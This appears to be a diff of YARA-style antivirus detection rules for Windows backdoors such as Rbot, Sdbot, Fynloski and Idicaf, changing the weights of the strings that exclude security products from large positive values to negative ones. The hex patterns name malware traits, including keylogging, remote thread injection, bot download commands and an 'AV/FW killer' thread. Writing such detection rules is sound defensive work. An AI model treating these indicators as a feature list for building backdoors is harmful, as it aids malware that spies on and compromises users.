$a_00_1 = {47 00 72 00 69 00 64 00 69 00 6e 00 53 00 6f 00 66 00 74 00 20 00 4c 00 4c 00 43 00 } //65486 GridinSoft LLC
$a_00_2 = {49 00 6e 00 74 00 65 00 72 00 6e 00 61 00 6c 00 4e 00 61 00 6d 00 65 00 00 00 67 00 73 00 61 00 6d 00 2e 00 65 00 78 00 65 00 } //65486
$a_00_0 = {5c 00 73 00 68 00 6b 00 65 00 72 00 6e 00 65 00 6c 00 5c 00 48 00 65 00 6c 00 70 00 64 00 65 00 73 00 6b 00 44 00 61 00 74 00 61 00 53 00 74 00 72 00 75 00 63 00 74 00 73 00 2e 00 68 00 } //-100 \shkernel\HelpdeskDataStructs.h
$a_00_1 = {47 00 72 00 69 00 64 00 69 00 6e 00 53 00 6f 00 66 00 74 00 20 00 4c 00 4c 00 43 00 } //-50 GridinSoft LLC
$a_00_2 = {49 00 6e 00 74 00 65 00 72 00 6e 00 61 00 6c 00 4e 00 61 00 6d 00 65 00 00 00 67 00 73 00 61 00 6d 00 2e 00 65 00 78 00 65 00 } //-50
$a_01_3 = {23 42 4f 54 23 56 69 73 69 74 55 72 6c } //1 #BOT#VisitUrl
$a_01_4 = {23 42 4f 54 23 53 76 72 55 6e 69 6e 73 74 61 6c 6c } //1 #BOT#SvrUninstall
$a_01_5 = {23 42 4f 54 23 55 52 4c 44 6f 77 6e 6c 6f 61 64 } //1 #BOT#URLDownload
@ -27,6 +27,6 @@ rule Backdoor_Win32_Fynloski_gen_A{
$a_03_20 = {30 04 32 46 ff 4d 90 01 01 90 13 43 81 e3 ff 00 00 80 90 00 } //1
$a_03_21 = {8b 06 83 f8 2e 0f 8f 90 01 02 00 00 0f 84 90 01 02 00 00 83 c0 f8 83 f8 25 0f 87 90 01 02 00 00 ff 24 90 00 } //2
condition:
((#a_00_0 & 1)*65436+(#a_00_1 & 1)*65486+(#a_00_2 & 1)*65486+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_01_12 & 1)*1+(#a_01_13 & 1)*1+(#a_01_14 & 1)*1+(#a_01_15 & 1)*1+(#a_01_16 & 1)*1+(#a_01_17 & 1)*1+(#a_01_18 & 1)*1+(#a_01_19 & 1)*1+(#a_03_20 & 1)*1+(#a_03_21 & 1)*2) >=5
((#a_00_0 & 1)*-100+(#a_00_1 & 1)*-50+(#a_00_2 & 1)*-50+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_01_12 & 1)*1+(#a_01_13 & 1)*1+(#a_01_14 & 1)*1+(#a_01_15 & 1)*1+(#a_01_16 & 1)*1+(#a_01_17 & 1)*1+(#a_01_18 & 1)*1+(#a_01_19 & 1)*1+(#a_03_20 & 1)*1+(#a_03_21 & 1)*2) >=5
}


@ -4,7 +4,7 @@ rule Backdoor_Win32_Idicaf_gen_A{
description = "Backdoor:Win32/Idicaf.gen!A,SIGNATURE_TYPE_PEHSTR_EXT,19 00 19 00 0e 00 00 "
strings :
$a_01_0 = {5c 53 69 6d 70 6c 79 20 53 75 70 65 72 20 53 6f 66 74 77 61 72 65 5c 54 72 6f 6a 61 6e 20 52 65 6d 6f 76 65 72 5c } //65436 \Simply Super Software\Trojan Remover\
$a_01_0 = {5c 53 69 6d 70 6c 79 20 53 75 70 65 72 20 53 6f 66 74 77 61 72 65 5c 54 72 6f 6a 61 6e 20 52 65 6d 6f 76 65 72 5c } //-100 \Simply Super Software\Trojan Remover\
$a_00_1 = {b8 68 58 4d 56 bb 00 00 00 00 b9 0a 00 00 00 ba 58 56 00 00 ed 81 fb 68 58 4d 56 } //20
$a_00_2 = {49 6e 6a 65 63 74 } //1 Inject
$a_00_3 = {4b 65 79 4c 6f 67 } //1 KeyLog
@ -19,6 +19,6 @@ rule Backdoor_Win32_Idicaf_gen_A{
$a_00_12 = {69 66 20 65 78 69 73 74 20 22 25 73 22 20 67 6f 74 6f 20 73 65 6c 66 6b 69 6c 6c } //1 if exist "%s" goto selfkill
$a_00_13 = {43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 } //1 CreateRemoteThread
condition:
((#a_01_0 & 1)*65436+(#a_00_1 & 1)*20+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1) >=25
((#a_01_0 & 1)*-100+(#a_00_1 & 1)*20+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1) >=25
}


@ -8,9 +8,9 @@ rule Backdoor_Win32_Popwin_gen_E{
$a_00_1 = {44 65 6c 65 74 65 55 72 6c 43 61 63 68 65 45 6e 74 72 79 } //10 DeleteUrlCacheEntry
$a_01_2 = {3d 2b 05 00 00 73 07 b8 e6 73 3e 02 c9 c3 83 f8 f0 76 0b 33 d2 b9 00 e1 f5 05 f7 f1 8b c2 c9 c3 } //1
$a_01_3 = {8a 55 10 8d 84 0d fc fe ff ff 2a d1 8a 1c 06 32 da 41 3b 4d 10 88 18 7c e7 } //5
$a_00_4 = {77 77 77 2e 33 36 30 2e 63 6e } //65436 www.360.cn
$a_00_5 = {33 36 30 73 61 66 65 75 70 6c 6f 61 64 5f 6d 75 74 65 78 } //65436 360safeupload_mutex
$a_00_4 = {77 77 77 2e 33 36 30 2e 63 6e } //-100 www.360.cn
$a_00_5 = {33 36 30 73 61 66 65 75 70 6c 6f 61 64 5f 6d 75 74 65 78 } //-100 360safeupload_mutex
condition:
((#a_00_0 & 1)*10+(#a_00_1 & 1)*10+(#a_01_2 & 1)*1+(#a_01_3 & 1)*5+(#a_00_4 & 1)*65436+(#a_00_5 & 1)*65436) >=21
((#a_00_0 & 1)*10+(#a_00_1 & 1)*10+(#a_01_2 & 1)*1+(#a_01_3 & 1)*5+(#a_00_4 & 1)*-100+(#a_00_5 & 1)*-100) >=21
}


@ -26,8 +26,8 @@ rule Backdoor_Win32_PornDialer_G{
$a_00_19 = {30 39 33 30 38 32 30 37 30 34 } //1 0930820704
$a_00_20 = {31 39 30 30 38 30 37 38 38 } //1 190080788
$a_00_21 = {66 69 6e 64 65 6e 20 53 69 65 20 68 69 65 72 20 77 77 77 2e 67 6c 6f 62 61 6c 2d 6e 65 74 63 6f 6d 2e 64 65 2f 44 69 61 6c 65 72 2d 41 47 42 } //1 finden Sie hier www.global-netcom.de/Dialer-AGB
$a_00_22 = {50 72 69 6e 74 20 77 69 74 68 20 7a 6f 64 69 61 63 20 73 69 67 6e 20 62 65 74 77 65 65 6e 20 64 65 67 72 65 65 73 20 61 6e 64 20 6d 69 6e 75 74 65 73 } //65436 Print with zodiac sign between degrees and minutes
$a_00_22 = {50 72 69 6e 74 20 77 69 74 68 20 7a 6f 64 69 61 63 20 73 69 67 6e 20 62 65 74 77 65 65 6e 20 64 65 67 72 65 65 73 20 61 6e 64 20 6d 69 6e 75 74 65 73 } //-100 Print with zodiac sign between degrees and minutes
condition:
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_01_14 & 1)*1+(#a_01_15 & 1)*1+(#a_00_16 & 1)*1+(#a_00_17 & 1)*1+(#a_00_18 & 1)*1+(#a_00_19 & 1)*1+(#a_00_20 & 1)*1+(#a_00_21 & 1)*1+(#a_00_22 & 1)*65436) >=8
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_01_14 & 1)*1+(#a_01_15 & 1)*1+(#a_00_16 & 1)*1+(#a_00_17 & 1)*1+(#a_00_18 & 1)*1+(#a_00_19 & 1)*1+(#a_00_20 & 1)*1+(#a_00_21 & 1)*1+(#a_00_22 & 1)*-100) >=8
}


@ -4,8 +4,8 @@ rule Backdoor_Win32_Rbot{
description = "Backdoor:Win32/Rbot,SIGNATURE_TYPE_PEHSTR_EXT,1e 00 14 00 ffffffb0 00 00 "
strings :
$a_00_0 = {4d 00 63 00 41 00 66 00 65 00 65 00 20 00 53 00 74 00 69 00 6e 00 67 00 65 00 72 00 } //65436 McAfee Stinger
$a_00_1 = {4d 00 63 00 41 00 66 00 65 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 53 00 74 00 69 00 6e 00 67 00 65 00 72 00 } //65436 McAfee Inc. Stinger
$a_00_0 = {4d 00 63 00 41 00 66 00 65 00 65 00 20 00 53 00 74 00 69 00 6e 00 67 00 65 00 72 00 } //-100 McAfee Stinger
$a_00_1 = {4d 00 63 00 41 00 66 00 65 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 53 00 74 00 69 00 6e 00 67 00 65 00 72 00 } //-100 McAfee Inc. Stinger
$a_00_2 = {4e 54 50 61 73 73 } //1 NTPass
$a_00_3 = {6e 74 73 63 61 6e 31 33 39 } //1 ntscan139
$a_00_4 = {6e 74 73 63 61 6e 34 34 35 } //1 ntscan445
@ -181,6 +181,6 @@ rule Backdoor_Win32_Rbot{
$a_00_174 = {73 74 61 72 74 20 41 56 2f 46 57 20 6b 69 6c 6c 65 72 20 74 68 72 65 61 64 } //2 start AV/FW killer thread
$a_00_175 = {53 65 72 76 73 74 72 69 63 74 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 49 50 43 24 } //2 Servstrict access to the IPC$
condition:
((#a_00_0 & 1)*65436+(#a_00_1 & 1)*65436+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_00_14 & 1)*1+(#a_00_15 & 1)*1+(#a_00_16 & 1)*1+(#a_00_17 & 1)*1+(#a_00_18 & 1)*1+(#a_00_19 & 1)*1+(#a_00_20 & 1)*1+(#a_00_21 & 1)*1+(#a_00_22 & 1)*1+(#a_00_23 & 1)*1+(#a_00_24 & 1)*1+(#a_00_25 & 1)*1+(#a_00_26 & 1)*2+(#a_00_27 & 1)*2+(#a_00_28 & 1)*2+(#a_00_29 & 1)*1+(#a_00_30 & 1)*1+(#a_00_31 & 1)*1+(#a_00_32 & 1)*1+(#a_00_33 & 1)*2+(#a_00_34 & 1)*1+(#a_00_35 & 1)*1+(#a_00_36 & 1)*1+(#a_00_37 & 1)*1+(#a_00_38 & 1)*1+(#a_00_39 & 1)*1+(#a_00_40 & 1)*1+(#a_00_41 & 1)*2+(#a_00_42 & 1)*2+(#a_00_43 & 1)*2+(#a_00_44 & 1)*1+(#a_00_45 & 1)*1+(#a_00_46 & 1)*1+(#a_00_47 & 1)*1+(#a_00_48 & 1)*1+(#a_00_49 & 1)*1+(#a_00_50 & 1)*1+(#a_00_51 & 1)*1+(#a_00_52 & 1)*1+(#a_00_53 & 1)*1+(#a_00_54 & 1)*1+(#a_00_55 & 1)*1+(#a_00_56 & 1)*1+(#a_00_57 & 1)*1+(#a_00_58 & 1)*1+(#a_00_59 & 1)*1+(#a_00_60 & 1)*1+(#a_00_61 & 1)*1+(#a_00_62 & 1)*1+(#a_00_63 & 1)*1+(#a_00_64 & 1)*1+(#a_00_65 & 1)*1+(#a_00_66 & 1)*1+(#a_00_67 & 1)*1+(#a_00_68 & 1)*1+(#a_00_69 & 1)*1+(#a_00_70 & 1)*1+(#a_00_71 & 1)*1+(#a_00_72 & 1)*1+(#a_00_73 & 1)*1+(#a_00_74 & 1)*1+(#a_00_75 & 1)*1+(#a_00_76 & 1)*1+(#a_01_77 & 1)*2+(#a_00_78 & 1)*1+(#a_00_79 & 1)*2+(#a_00_80 & 1)*2+(#a_00_81 & 1)*1+(#a_00_82 & 1)*1+(#a_00_83 & 1)*1+(#a_00_84 & 1)*1+(#a_00_85 & 1)*1+(#a_00_86 & 1)*1+(#a_00_87 & 1)*1+(#a_00_88 & 1)*1+(#a_00_89 & 1)*1+(#a_00_90 & 1)*3+(#a_00_91 & 1)*1+(#a_00_92 & 1)*1+(#a_00_93 & 1)*1+(#a_00_94 & 1)*1+(#a_00_95 & 1)*1+(#a_00_96 & 1)*1+(#a_00_97 & 1)*1+(#a_00_98 & 1)*1+(#a_00_99 & 1)*1+(#a_00_100 & 1)*1+(#a_00_101 & 1)*1+(#a_00_102 & 1)*1+(#a_00_103 & 1)*1+(#a_00_104 & 1)*1+(#a_00_105 & 1)*1+(#a_00_106 & 1)*1+(#a_00_107 & 1)*1+(#a_00_108 & 1)*1+(#a_00_109 & 1)*1+(#a_00_110 & 1)*1+(#a_00_111 & 1)*1+(#a_00_112 & 1)*1+(#a_00_113 & 1)*1+(#a_00_114 & 1)*1+(#a_00_115 & 1)*1+(#a_00_116 & 
1)*1+(#a_00_117 & 1)*1+(#a_00_118 & 1)*1+(#a_00_119 & 1)*2+(#a_00_120 & 1)*2+(#a_00_121 & 1)*1+(#a_00_122 & 1)*2+(#a_00_123 & 1)*2+(#a_00_124 & 1)*1+(#a_00_125 & 1)*1+(#a_00_126 & 1)*3+(#a_00_127 & 1)*3+(#a_00_128 & 1)*1+(#a_00_129 & 1)*1+(#a_00_130 & 1)*1+(#a_00_131 & 1)*1+(#a_00_132 & 1)*2+(#a_00_133 & 1)*3+(#a_00_134 & 1)*1+(#a_00_135 & 1)*1+(#a_00_136 & 1)*1+(#a_00_137 & 1)*2+(#a_00_138 & 1)*3+(#a_00_139 & 1)*1+(#a_01_140 & 1)*1+(#a_01_141 & 1)*1+(#a_01_142 & 1)*1+(#a_00_143 & 1)*1+(#a_00_144 & 1)*1+(#a_00_145 & 1)*1+(#a_00_146 & 1)*2+(#a_00_147 & 1)*1+(#a_00_148 & 1)*2+(#a_00_149 & 1)*1+(#a_00_150 & 1)*1+(#a_00_151 & 1)*1+(#a_00_152 & 1)*2+(#a_00_153 & 1)*1+(#a_00_154 & 1)*1+(#a_00_155 & 1)*1+(#a_00_156 & 1)*1+(#a_00_157 & 1)*1+(#a_00_158 & 1)*1+(#a_00_159 & 1)*1+(#a_00_160 & 1)*1+(#a_00_161 & 1)*1+(#a_00_162 & 1)*1+(#a_00_163 & 1)*1+(#a_00_164 & 1)*1+(#a_00_165 & 1)*1+(#a_00_166 & 1)*1+(#a_00_167 & 1)*1+(#a_00_168 & 1)*1+(#a_00_169 & 1)*1+(#a_00_170 & 1)*1+(#a_02_171 & 1)*2+(#a_00_172 & 1)*1+(#a_00_173 & 1)*2+(#a_00_174 & 1)*2+(#a_00_175 & 1)*2) >=20
((#a_00_0 & 1)*-100+(#a_00_1 & 1)*-100+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_00_14 & 1)*1+(#a_00_15 & 1)*1+(#a_00_16 & 1)*1+(#a_00_17 & 1)*1+(#a_00_18 & 1)*1+(#a_00_19 & 1)*1+(#a_00_20 & 1)*1+(#a_00_21 & 1)*1+(#a_00_22 & 1)*1+(#a_00_23 & 1)*1+(#a_00_24 & 1)*1+(#a_00_25 & 1)*1+(#a_00_26 & 1)*2+(#a_00_27 & 1)*2+(#a_00_28 & 1)*2+(#a_00_29 & 1)*1+(#a_00_30 & 1)*1+(#a_00_31 & 1)*1+(#a_00_32 & 1)*1+(#a_00_33 & 1)*2+(#a_00_34 & 1)*1+(#a_00_35 & 1)*1+(#a_00_36 & 1)*1+(#a_00_37 & 1)*1+(#a_00_38 & 1)*1+(#a_00_39 & 1)*1+(#a_00_40 & 1)*1+(#a_00_41 & 1)*2+(#a_00_42 & 1)*2+(#a_00_43 & 1)*2+(#a_00_44 & 1)*1+(#a_00_45 & 1)*1+(#a_00_46 & 1)*1+(#a_00_47 & 1)*1+(#a_00_48 & 1)*1+(#a_00_49 & 1)*1+(#a_00_50 & 1)*1+(#a_00_51 & 1)*1+(#a_00_52 & 1)*1+(#a_00_53 & 1)*1+(#a_00_54 & 1)*1+(#a_00_55 & 1)*1+(#a_00_56 & 1)*1+(#a_00_57 & 1)*1+(#a_00_58 & 1)*1+(#a_00_59 & 1)*1+(#a_00_60 & 1)*1+(#a_00_61 & 1)*1+(#a_00_62 & 1)*1+(#a_00_63 & 1)*1+(#a_00_64 & 1)*1+(#a_00_65 & 1)*1+(#a_00_66 & 1)*1+(#a_00_67 & 1)*1+(#a_00_68 & 1)*1+(#a_00_69 & 1)*1+(#a_00_70 & 1)*1+(#a_00_71 & 1)*1+(#a_00_72 & 1)*1+(#a_00_73 & 1)*1+(#a_00_74 & 1)*1+(#a_00_75 & 1)*1+(#a_00_76 & 1)*1+(#a_01_77 & 1)*2+(#a_00_78 & 1)*1+(#a_00_79 & 1)*2+(#a_00_80 & 1)*2+(#a_00_81 & 1)*1+(#a_00_82 & 1)*1+(#a_00_83 & 1)*1+(#a_00_84 & 1)*1+(#a_00_85 & 1)*1+(#a_00_86 & 1)*1+(#a_00_87 & 1)*1+(#a_00_88 & 1)*1+(#a_00_89 & 1)*1+(#a_00_90 & 1)*3+(#a_00_91 & 1)*1+(#a_00_92 & 1)*1+(#a_00_93 & 1)*1+(#a_00_94 & 1)*1+(#a_00_95 & 1)*1+(#a_00_96 & 1)*1+(#a_00_97 & 1)*1+(#a_00_98 & 1)*1+(#a_00_99 & 1)*1+(#a_00_100 & 1)*1+(#a_00_101 & 1)*1+(#a_00_102 & 1)*1+(#a_00_103 & 1)*1+(#a_00_104 & 1)*1+(#a_00_105 & 1)*1+(#a_00_106 & 1)*1+(#a_00_107 & 1)*1+(#a_00_108 & 1)*1+(#a_00_109 & 1)*1+(#a_00_110 & 1)*1+(#a_00_111 & 1)*1+(#a_00_112 & 1)*1+(#a_00_113 & 1)*1+(#a_00_114 & 1)*1+(#a_00_115 & 1)*1+(#a_00_116 & 
1)*1+(#a_00_117 & 1)*1+(#a_00_118 & 1)*1+(#a_00_119 & 1)*2+(#a_00_120 & 1)*2+(#a_00_121 & 1)*1+(#a_00_122 & 1)*2+(#a_00_123 & 1)*2+(#a_00_124 & 1)*1+(#a_00_125 & 1)*1+(#a_00_126 & 1)*3+(#a_00_127 & 1)*3+(#a_00_128 & 1)*1+(#a_00_129 & 1)*1+(#a_00_130 & 1)*1+(#a_00_131 & 1)*1+(#a_00_132 & 1)*2+(#a_00_133 & 1)*3+(#a_00_134 & 1)*1+(#a_00_135 & 1)*1+(#a_00_136 & 1)*1+(#a_00_137 & 1)*2+(#a_00_138 & 1)*3+(#a_00_139 & 1)*1+(#a_01_140 & 1)*1+(#a_01_141 & 1)*1+(#a_01_142 & 1)*1+(#a_00_143 & 1)*1+(#a_00_144 & 1)*1+(#a_00_145 & 1)*1+(#a_00_146 & 1)*2+(#a_00_147 & 1)*1+(#a_00_148 & 1)*2+(#a_00_149 & 1)*1+(#a_00_150 & 1)*1+(#a_00_151 & 1)*1+(#a_00_152 & 1)*2+(#a_00_153 & 1)*1+(#a_00_154 & 1)*1+(#a_00_155 & 1)*1+(#a_00_156 & 1)*1+(#a_00_157 & 1)*1+(#a_00_158 & 1)*1+(#a_00_159 & 1)*1+(#a_00_160 & 1)*1+(#a_00_161 & 1)*1+(#a_00_162 & 1)*1+(#a_00_163 & 1)*1+(#a_00_164 & 1)*1+(#a_00_165 & 1)*1+(#a_00_166 & 1)*1+(#a_00_167 & 1)*1+(#a_00_168 & 1)*1+(#a_00_169 & 1)*1+(#a_00_170 & 1)*1+(#a_02_171 & 1)*2+(#a_00_172 & 1)*1+(#a_00_173 & 1)*2+(#a_00_174 & 1)*2+(#a_00_175 & 1)*2) >=20
}


@ -16,9 +16,9 @@ rule Backdoor_Win32_Sdbot{
$a_00_9 = {73 70 79 20 63 72 65 61 74 65 64 20 6f 6e } //2 spy created on
$a_00_10 = {63 6c 6f 6e 65 20 63 72 65 61 74 65 64 20 6f 6e 20 25 73 3a 25 64 2c 20 69 6e 20 63 68 61 6e 6e 65 6c 20 25 73 2e } //1 clone created on %s:%d, in channel %s.
$a_00_11 = {63 6f 6e 6e 65 63 74 69 6f 6e 20 74 79 70 65 3a 20 25 73 20 28 25 73 29 2e 20 6c 6f 63 61 6c 20 49 50 20 61 64 64 72 65 73 73 3a 20 25 64 2e 25 64 2e 25 64 2e 25 64 2e 20 63 6f 6e 6e 65 63 74 65 64 20 66 72 6f 6d 3a 20 25 73 } //1 connection type: %s (%s). local IP address: %d.%d.%d.%d. connected from: %s
$a_80_12 = {4d 63 41 66 65 65 20 53 74 69 6e 67 65 72 } //McAfee Stinger 65526
$a_00_13 = {4d 00 63 00 41 00 66 00 65 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 53 00 74 00 69 00 6e 00 67 00 65 00 72 00 } //65526 McAfee Inc. Stinger
$a_80_12 = {4d 63 41 66 65 65 20 53 74 69 6e 67 65 72 } //McAfee Stinger -10
$a_00_13 = {4d 00 63 00 41 00 66 00 65 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 53 00 74 00 69 00 6e 00 67 00 65 00 72 00 } //-10 McAfee Inc. Stinger
condition:
((#a_00_0 & 1)*1+(#a_00_1 & 1)*2+(#a_00_2 & 1)*2+(#a_00_3 & 1)*2+(#a_00_4 & 1)*2+(#a_00_5 & 1)*2+(#a_00_6 & 1)*2+(#a_00_7 & 1)*2+(#a_00_8 & 1)*1+(#a_00_9 & 1)*2+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_80_12 & 1)*65526+(#a_00_13 & 1)*65526) >=8
((#a_00_0 & 1)*1+(#a_00_1 & 1)*2+(#a_00_2 & 1)*2+(#a_00_3 & 1)*2+(#a_00_4 & 1)*2+(#a_00_5 & 1)*2+(#a_00_6 & 1)*2+(#a_00_7 & 1)*2+(#a_00_8 & 1)*1+(#a_00_9 & 1)*2+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_80_12 & 1)*-10+(#a_00_13 & 1)*-10) >=8
}


@ -50,9 +50,9 @@ rule Backdoor_Win32_Trochil_A_dll{
$a_80_43 = {74 72 79 20 74 6f 20 63 6c 65 61 6e 20 25 73 } //try to clean %s 1
$a_80_44 = {74 72 79 20 74 6f 20 72 65 6d 6f 76 65 5b 25 73 5d } //try to remove[%s] 1
$a_80_45 = {58 4c 53 65 72 76 61 6e 74 } //XLServant 1
$a_80_46 = {43 3a 5c 64 65 76 5c 50 61 6c 61 64 69 6e 5c 50 61 6c 61 64 69 6e 5c 74 61 72 67 65 74 5c 72 65 6c 65 61 73 65 5c 64 65 70 73 5c 50 61 6c 61 64 69 6e 2e 70 64 62 } //C:\dev\Paladin\Paladin\target\release\deps\Paladin.pdb 65526
$a_80_47 = {43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 50 61 6c 61 64 69 6e 5c 4c 6f 67 73 5c 4c 6f 67 2e 70 61 6c 61 64 69 6e } //C:\Program Files\Paladin\Logs\Log.paladin 65526
$a_80_46 = {43 3a 5c 64 65 76 5c 50 61 6c 61 64 69 6e 5c 50 61 6c 61 64 69 6e 5c 74 61 72 67 65 74 5c 72 65 6c 65 61 73 65 5c 64 65 70 73 5c 50 61 6c 61 64 69 6e 2e 70 64 62 } //C:\dev\Paladin\Paladin\target\release\deps\Paladin.pdb -10
$a_80_47 = {43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 50 61 6c 61 64 69 6e 5c 4c 6f 67 73 5c 4c 6f 67 2e 70 61 6c 61 64 69 6e } //C:\Program Files\Paladin\Logs\Log.paladin -10
condition:
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*1+(#a_80_9 & 1)*1+(#a_80_10 & 1)*1+(#a_80_11 & 1)*1+(#a_80_12 & 1)*1+(#a_80_13 & 1)*1+(#a_80_14 & 1)*1+(#a_80_15 & 1)*1+(#a_80_16 & 1)*1+(#a_80_17 & 1)*1+(#a_80_18 & 1)*1+(#a_80_19 & 1)*1+(#a_80_20 & 1)*1+(#a_80_21 & 1)*1+(#a_80_22 & 1)*1+(#a_80_23 & 1)*1+(#a_80_24 & 1)*1+(#a_80_25 & 1)*1+(#a_80_26 & 1)*1+(#a_80_27 & 1)*1+(#a_80_28 & 1)*1+(#a_80_29 & 1)*1+(#a_80_30 & 1)*1+(#a_80_31 & 1)*1+(#a_80_32 & 1)*1+(#a_80_33 & 1)*1+(#a_80_34 & 1)*1+(#a_80_35 & 1)*1+(#a_80_36 & 1)*1+(#a_80_37 & 1)*1+(#a_80_38 & 1)*1+(#a_80_39 & 1)*1+(#a_80_40 & 1)*1+(#a_80_41 & 1)*1+(#a_80_42 & 1)*1+(#a_80_43 & 1)*1+(#a_80_44 & 1)*1+(#a_80_45 & 1)*1+(#a_80_46 & 1)*65526+(#a_80_47 & 1)*65526) >=5
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*1+(#a_80_9 & 1)*1+(#a_80_10 & 1)*1+(#a_80_11 & 1)*1+(#a_80_12 & 1)*1+(#a_80_13 & 1)*1+(#a_80_14 & 1)*1+(#a_80_15 & 1)*1+(#a_80_16 & 1)*1+(#a_80_17 & 1)*1+(#a_80_18 & 1)*1+(#a_80_19 & 1)*1+(#a_80_20 & 1)*1+(#a_80_21 & 1)*1+(#a_80_22 & 1)*1+(#a_80_23 & 1)*1+(#a_80_24 & 1)*1+(#a_80_25 & 1)*1+(#a_80_26 & 1)*1+(#a_80_27 & 1)*1+(#a_80_28 & 1)*1+(#a_80_29 & 1)*1+(#a_80_30 & 1)*1+(#a_80_31 & 1)*1+(#a_80_32 & 1)*1+(#a_80_33 & 1)*1+(#a_80_34 & 1)*1+(#a_80_35 & 1)*1+(#a_80_36 & 1)*1+(#a_80_37 & 1)*1+(#a_80_38 & 1)*1+(#a_80_39 & 1)*1+(#a_80_40 & 1)*1+(#a_80_41 & 1)*1+(#a_80_42 & 1)*1+(#a_80_43 & 1)*1+(#a_80_44 & 1)*1+(#a_80_45 & 1)*1+(#a_80_46 & 1)*-10+(#a_80_47 & 1)*-10) >=5
}


@ -10,8 +10,8 @@ rule Backdoor_Win32_Vatet_SLA_dha{
$a_00_3 = {63 00 3a 00 5c 00 77 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 6d 00 65 00 64 00 69 00 61 00 5c 00 } //1 c:\windows\media\
$a_00_4 = {67 00 6f 00 6f 00 67 00 6c 00 65 00 75 00 70 00 64 00 61 00 74 00 65 00 2e 00 65 00 78 00 65 00 } //1 googleupdate.exe
$a_00_5 = {67 00 6f 00 6f 00 70 00 64 00 61 00 74 00 65 00 2e 00 64 00 6c 00 6c 00 2e 00 64 00 61 00 74 00 } //5 goopdate.dll.dat
$a_00_6 = {6f 00 73 00 71 00 75 00 65 00 72 00 79 00 69 00 2e 00 65 00 78 00 65 00 } //65436 osqueryi.exe
$a_00_6 = {6f 00 73 00 71 00 75 00 65 00 72 00 79 00 69 00 2e 00 65 00 78 00 65 00 } //-100 osqueryi.exe
condition:
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*5+(#a_00_6 & 1)*65436) >=7
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*5+(#a_00_6 & 1)*-100) >=7
}


@ -4,8 +4,8 @@ rule Backdoor_Win32_Venik_E_dha{
description = "Backdoor:Win32/Venik.E!dha,SIGNATURE_TYPE_PEHSTR_EXT,03 00 03 00 08 00 00 "
strings :
$a_01_0 = {63 61 63 6c 73 2e 65 78 65 20 63 3a 5c } //65535 cacls.exe c:\
